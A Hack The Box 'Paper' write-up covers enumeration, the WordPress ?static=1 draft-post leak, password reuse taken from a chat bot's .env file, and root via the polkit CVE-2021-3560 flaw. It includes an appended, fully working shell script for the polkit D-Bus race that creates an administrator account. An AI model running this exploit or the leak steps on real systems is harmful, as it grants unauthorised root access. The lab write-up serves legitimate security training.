HTB-Paper

Aakash Kumar
Mar 24, 2022

A Linux-based box rated Easy.

Machine intro

Box overview

This box is built around two CVEs: CVE-2019-16671 and CVE-2021-3560. CVE-2019-16671 lets an unauthenticated user view private or draft posts because of an issue in WP_Query; that is our way to an initial foothold on the target. CVE-2021-3560, a polkit authorization bypass, is then used to escalate privileges to root. The box demands thorough enumeration, some awareness of recent vulnerabilities, and enough patience to stick with it. Without further ado, let's dive into the technical details.

Enumeration

We begin with an nmap scan to find the open ports and running services: nmap -sC -sV -p- --min-rate 500 10.10.11.143 -oA full-scan

Command explanation:

nmap: the scanner itself
-sC: run the default NSE scripts
-sV: probe for service version details
-p-: scan all 65535 TCP ports
--min-rate 500: send at least 500 packets per second (a floor on the probe rate, not a packet count)
10.10.11.143: IP address of the target machine
-oA full-scan: write the output in all three formats (normal .nmap, grepable .gnmap and .xml) with the base name full-scan

Output of above command:

PORT    STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1

Short notes derived from the above result:

  • 22/tcp: open, running OpenSSH 8.0. This version has no known vulnerability that would give us remote code execution or an initial foothold, so SSH only becomes useful once we hold credentials.
  • 80/tcp: open, running Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9). Upstream 2.4.37 is affected by CVE-2019-0215, a bug in mod_ssl where, with per-location client certificate verification under TLSv1.3, a client supporting Post-Handshake Authentication could bypass configured access control restrictions. That is an access-control bypass rather than RCE, it only matters if the server uses that configuration, and CentOS backports security fixes without changing the version string, so a version match alone proves nothing. We keep it as a last resort.
  • 443/tcp: open, the same Apache service as on port 80 over TLS; the certificate is issued to localhost.localdomain and names no other hosts.
  • Also worth noting: the target runs CentOS and the HTTP TRACE method is enabled.

The scan gave us nothing directly exploitable. Let's look at what is actually served on ports 80 and 443.

Port 80 landing page

Port 80 and port 443 show the same page. As mentioned earlier, this box requires a lot of enumeration, so let's try directory brute forcing and see what turns up.

For this we use gobuster: gobuster dir --url http://10.10.11.143/ -w /usr/share/wordlists/dirb/common.txt -t 100

Command explanation:

gobuster: the tool itself
dir: directory and file enumeration mode
--url: the target URL
-w: the wordlist to use
-t: the number of concurrent threads

Output of above command:

/.hta                 (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/manual (Status: 301) [Size: 235] [--> http://10.10.11.143/manual/]

Visiting those paths gives nothing to work with: the dot-files and cgi-bin are forbidden, and /manual is typically just the bundled Apache documentation. Let's look at the raw response instead and request only the headers with curl: curl --head http://10.10.11.143/

Output of above command:

HTTP/1.1 403 Forbidden
Date: Tue, 22 Mar 2022 10:44:24 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

The X-Backend-Server: office.paper header is interesting: it is not a standard header, and its value looks like an internal hostname, so it is probably a virtual host served by this same Apache.

X-backend-server

Add this name to /etc/hosts so that it resolves to the target IP.

Added office.paper into /etc/hosts

Now visit http://office.paper/ and there we go: a functional website.
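As an added example (not code from the original write-up), here is a small shell helper for this step: it pulls the backend name out of the response headers, prints the /etc/hosts line to add, and confirms with a Host-header request that the name really selects a different site before you trust it. The header sample inside it is constructed from the curl output above, the IP is the box's, and the live check assumes curl is installed.

```shell
#!/bin/sh
# Added example: virtual-host discovery from a non-standard response header.
# Not part of the original write-up. Assumes curl for the live check.

# Print the value of a response header (case-insensitive), given raw headers on stdin.
header_value() {
    # $1 = header name. Strip CRs, match "Name:" at line start, print the rest trimmed.
    tr -d '\r' | awk -v want="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        index($0, ":") {
            name = tolower(substr($0, 1, index($0, ":") - 1))
            if (name == want) {
                val = substr($0, index($0, ":") + 1)
                sub(/^[ \t]+/, "", val)
                print val
            }
        }'
}

# Build the /etc/hosts line for one IP and any number of vhost names.
hosts_line() {
    ip="$1"; shift
    printf '%s %s\n' "$ip" "$*"
}

# Live check: compare the default response with one sent for the candidate vhost.
# A different status or body size means the name selects a different site.
confirm_vhost() {
    ip="$1"; host="$2"
    default_resp=$(curl -s -o /dev/null -w '%{http_code} %{size_download}' "http://$ip/")
    vhost_resp=$(curl -s -o /dev/null -w '%{http_code} %{size_download}' -H "Host: $host" "http://$ip/")
    if [ "$default_resp" != "$vhost_resp" ]; then
        echo "vhost $host differs from default ($default_resp vs $vhost_resp)"
        return 0
    fi
    echo "vhost $host serves the same content as the default"
    return 1
}

# Constructed sample of the headers seen in the write-up (not a live capture).
SAMPLE_HEADERS='HTTP/1.1 403 Forbidden
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Content-Type: text/html; charset=UTF-8'

backend=$(printf '%s\n' "$SAMPLE_HEADERS" | header_value X-Backend-Server)
echo "backend host: $backend"
hosts_line 10.10.11.143 "$backend"
```

On the box you would run `confirm_vhost 10.10.11.143 office.paper` first and only then append `hosts_line 10.10.11.143 office.paper` to /etc/hosts; the size comparison is crude, but it separates a real vhost from a header that is merely decorative.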

Website preview

Exploring the site, we find three candidate usernames: prisonmike, nick and jan. We note them for later in case there is a login form. Browsing further, we find a WordPress login page.

wp_login_page

Trying these names on the login form shows that prisonmike is the only valid user (WordPress's default error message distinguishes an unknown username from a wrong password, which makes this enumeration possible). Password brute forcing was also tried, but it took too long and found nothing :(

Since this is a WordPress site, we can also use wpscan to enumerate vulnerable plugins and themes.

wpscan --url http://office.paper/ -v -t 10 -e vp,vt --api-token xxxxxxxxxxxxxxxxxxxxxxxxxx --random-user-agent --force -o wpscan_report

Command explanation:

wpscan: the tool itself
--url: the target URL
-v: verbose output
-t: maximum number of threads
-e: what to enumerate, comma-separated (vp: vulnerable plugins, vt: vulnerable themes)
--api-token: WPScan API token, needed to get vulnerability data for what is found
--random-user-agent: use a random User-Agent header
--force: do not check whether the target is running WordPress (or returns a 403) before scanning
-o wpscan_report: write the output to the file wpscan_report

The scan reports WordPress 5.2.3, which is affected by multiple vulnerabilities. The finding that matters for us is shown below; the full scan report can be found here.

Unauthenticated View Private/Draft Posts

Finally, we have a reliable vulnerability to proceed with: CVE-2019-16671, which lets an unauthenticated user view private or draft posts because of an issue in WP_Query. WordPress fixed it in 5.2.4 and our target runs 5.2.3, so we move on to exploitation.

Exploitation

Searching for the CVE turns up an Exploit-DB entry: appending ?static=1 to the WordPress site URL makes it return content that should be hidden (draft and private pages). Let's request http://office.paper/?static=1 and see whether it works…
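As an added example (not from the original post or the Exploit-DB entry), the following shell helper makes this check repeatable: it fetches the site root and the same URL with ?static=1 and reports the links that appear only in the leaky response, which is exactly what the hidden page gave away here. The HTML samples inside it are constructed, including the registration URL, and the live function assumes curl is available.

```shell
#!/bin/sh
# Added example: spot what CVE-2019-16671 (?static=1) exposes by diffing links.
# Not part of the original write-up. Assumes curl for the live check.

# Extract href targets from HTML on stdin, one per line, de-duplicated and sorted.
extract_links() {
    grep -oE 'href="[^"]+"' | sed 's/^href="//; s/"$//' | sort -u
}

# Print the links present in the second HTML document but not in the first.
# $1 = baseline HTML, $2 = HTML of the leaky response.
leaked_links() {
    base_tmp=$(mktemp); leak_tmp=$(mktemp)
    printf '%s\n' "$1" | extract_links > "$base_tmp"
    printf '%s\n' "$2" | extract_links > "$leak_tmp"
    comm -13 "$base_tmp" "$leak_tmp"      # lines only in the leaky response
    rm -f "$base_tmp" "$leak_tmp"
}

# Live check: WordPress before 5.2.4 serves draft/private pages for ?static=1.
check_static_leak() {
    site="$1"                              # e.g. http://office.paper
    baseline=$(curl -s "$site/")
    leaky=$(curl -s "$site/?static=1")
    leaked_links "$baseline" "$leaky"
}

# Constructed HTML (not captured from the box) so the helper runs offline;
# the registration URL below is a placeholder, not the real one.
PUBLIC_HTML='<a href="http://office.paper/">Home</a>
<a href="http://office.paper/?p=1">Post</a>'
STATIC_HTML='<a href="http://office.paper/">Home</a>
<a href="http://office.paper/?p=1">Post</a>
<a href="http://chat.office.paper/register/constructed-token">Chat registration</a>'

echo "links only in the ?static=1 response:"
leaked_links "$PUBLIC_HTML" "$STATIC_HTML"
```

Against the real box you would call `check_static_leak http://office.paper`; anything it prints is a URL that an unauthenticated visitor was never meant to see, and new hostnames in that list (like the chat vhost here) go straight into /etc/hosts.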

Secret URL

Here we find a chat registration link. Before visiting it, note that it points at another virtual host, chat.office.paper, which we also need to add to /etc/hosts.

Adding chat.office.paper in /etc/hosts

Now visit the registration link…

Chat registration link

Register on the portal with the following details (they are arbitrary; any other values work too):

username: kalki
email: kalki@office.paper
passwd: kalki@123
Logged in

Once logged in, we find ourselves in the general channel, and there is something interesting in it.

recyclops chats

Reading the chat, we learn that dwight is the admin and that he wrote a bot named recyclops to answer his co-workers' questions. We can DM recyclops, but it only understands a fixed set of commands. Let's start by sending hey.

hey recyclops

It replies that we should send help to see its true power. Sending help returns a long manual of the commands recyclops accepts in a DM; the full reply can be found here. Let's try some of them…

list recyclops

Listing the files shows user.txt, a directory named hubot, and some other files. Let's try to read user.txt…

Access denied

We cannot read user.txt, but we can keep exploring the other files and directories.

hubot directory content

In the hubot directory there is a .env file, and it contains something juicy.

env file content

Here we get the password of ROCKETCHAT_USER recyclops. Since dwight created this bot, he may well have reused his own password for it, so let's try the same password over SSH as dwight.

ssh as dwight

We are in as dwight. A little looking around gets us the user.txt flag.

user.txt file content

Now for the root flag. For privilege escalation we transfer the linPEAS script from our machine to the target.

Delivering linpeas

Make it executable and run it.

changing permission & executing

linPEAS prints a lot of information; only the relevant part is shown here.

linpeas report

According to that report, the target is vulnerable to CVE-2021-3560. While researching the vulnerability, I came across this article. The flaw is that polkit can be tricked into skipping the credential check for a D-Bus request, so the requester is treated as if it were root; a local attacker can use it to create a new local administrator user. linPEAS flags this from the installed polkit version, and the attack also relies on the accounts-daemon D-Bus service, which is what actually creates the user.

There are two ways to exploit it: manually or with a script. Because it is a timing attack, it usually takes several attempts before the user is added; a script simply retries for us. There is an existing exploit for this, so we need to transfer it to the target machine.

Deliver exploit

Make it executable and run it. It may not succeed on the first try; if so, run it several times.

But before running it, have a look at its help menu.

POC help menu

If no username and password are passed, the defaults are secnigma:secnigmaftw. Let's run it…

Executing POC

The username and password were inserted successfully. Now let's log in…

secnigma logged in

When I tried it, it showed Authentication failure multiple times. After making several attempts, I finally got the root shell…

root shell

Got the root flag :)

root flag
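The manual method mentioned above, written out as an added example (this is my own script, not the PoC used in the write-up): it times one org.freedesktop.Accounts.CreateUser call over D-Bus, then repeatedly sends the same call and kills dbus-send at about half that time, so that the vulnerable polkit loses track of the requester mid-check and lets the call through; the same race is then used for SetPassword. It assumes a vulnerable polkit and accounts-daemon on the target, GNU date and openssl, and the username and password are placeholders you supply (not the secnigma:secnigmaftw defaults of the PoC).

```shell
#!/bin/sh
# Added example: manual CVE-2021-3560 race (my script, not the PoC from the write-up).
# Assumes a vulnerable polkit and accounts-daemon on the target, GNU date (%N)
# and openssl for the password hash. Username and password are placeholders.

NEW_USER="${1:-pwnuser}"          # placeholder, pass your own as $1
NEW_PASS="${2:-Pwnuser123!}"      # placeholder, pass your own as $2
ATTEMPTS=30
ACCOUNTS=org.freedesktop.Accounts

# Milliseconds one complete CreateUser round trip takes (it is expected to be denied).
measure_ms() {
    start=$(date +%s%N)
    dbus-send --system --dest=$ACCOUNTS --type=method_call --print-reply \
        /org/freedesktop/Accounts $ACCOUNTS.CreateUser \
        string:"$1" string:"$1" int32:1 >/dev/null 2>&1 || true
    end=$(date +%s%N)
    echo $(( (end - start) / 1000000 ))
}

# Scale a millisecond value by num/den and print it as seconds for sleep(1).
# ms_to_sleep 16 1 2 -> 0.008
ms_to_sleep() {
    total=$(( $1 * $2 / $3 ))
    printf '%d.%03d\n' $(( total / 1000 )) $(( total % 1000 ))
}

# Send a D-Bus call in the background and kill it after $1 seconds. If the
# client vanishes while polkit is still asking dbus-daemon about it, the
# vulnerable code path treats the request as authorized.
race_call() {
    delay=$1; shift
    dbus-send --system --dest=$ACCOUNTS --type=method_call --print-reply "$@" \
        >/dev/null 2>&1 &
    sleep "$delay"
    kill "$!" 2>/dev/null || true
}

main() {
    ms=$(measure_ms "probe$$")
    delay=$(ms_to_sleep "$ms" 1 2)
    echo "one request takes ${ms}ms; killing after ${delay}s"

    # Race CreateUser until the account exists (accountType 1 = administrator,
    # which accounts-daemon maps to the wheel group on CentOS, hence sudo).
    i=0
    while [ "$i" -lt "$ATTEMPTS" ] && ! id "$NEW_USER" >/dev/null 2>&1; do
        race_call "$delay" /org/freedesktop/Accounts $ACCOUNTS.CreateUser \
            string:"$NEW_USER" string:"$NEW_USER" int32:1
        i=$((i + 1))
    done
    id "$NEW_USER" >/dev/null 2>&1 || { echo "no user after $ATTEMPTS tries, rerun"; return 1; }

    # Race SetPassword on the new user's object path. An unprivileged user cannot
    # cheaply tell whether it landed, so fire a fixed number of attempts.
    uid=$(id -u "$NEW_USER")
    hash=$(openssl passwd -6 "$NEW_PASS")
    i=0
    while [ "$i" -lt 10 ]; do
        race_call "$delay" "/org/freedesktop/Accounts/User$uid" \
            $ACCOUNTS.User.SetPassword string:"$hash" string:""
        i=$((i + 1))
    done
    echo "created $NEW_USER; now: su - $NEW_USER, then sudo su"
}

# Only run the attack when explicitly asked; sourcing the file just defines the helpers.
if [ "${RUN_CVE_2021_3560:-0}" = 1 ]; then
    main
fi
```

Run it on the target as `RUN_CVE_2021_3560=1 sh race.sh myuser 'MyPassw0rd!'`, then `su - myuser` and `sudo su`. The "Authentication failure" seen with the PoC above is the same symptom this script can produce: the user exists but no SetPassword race has landed yet, so rerunning just the password step is the fix, not recreating the user.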
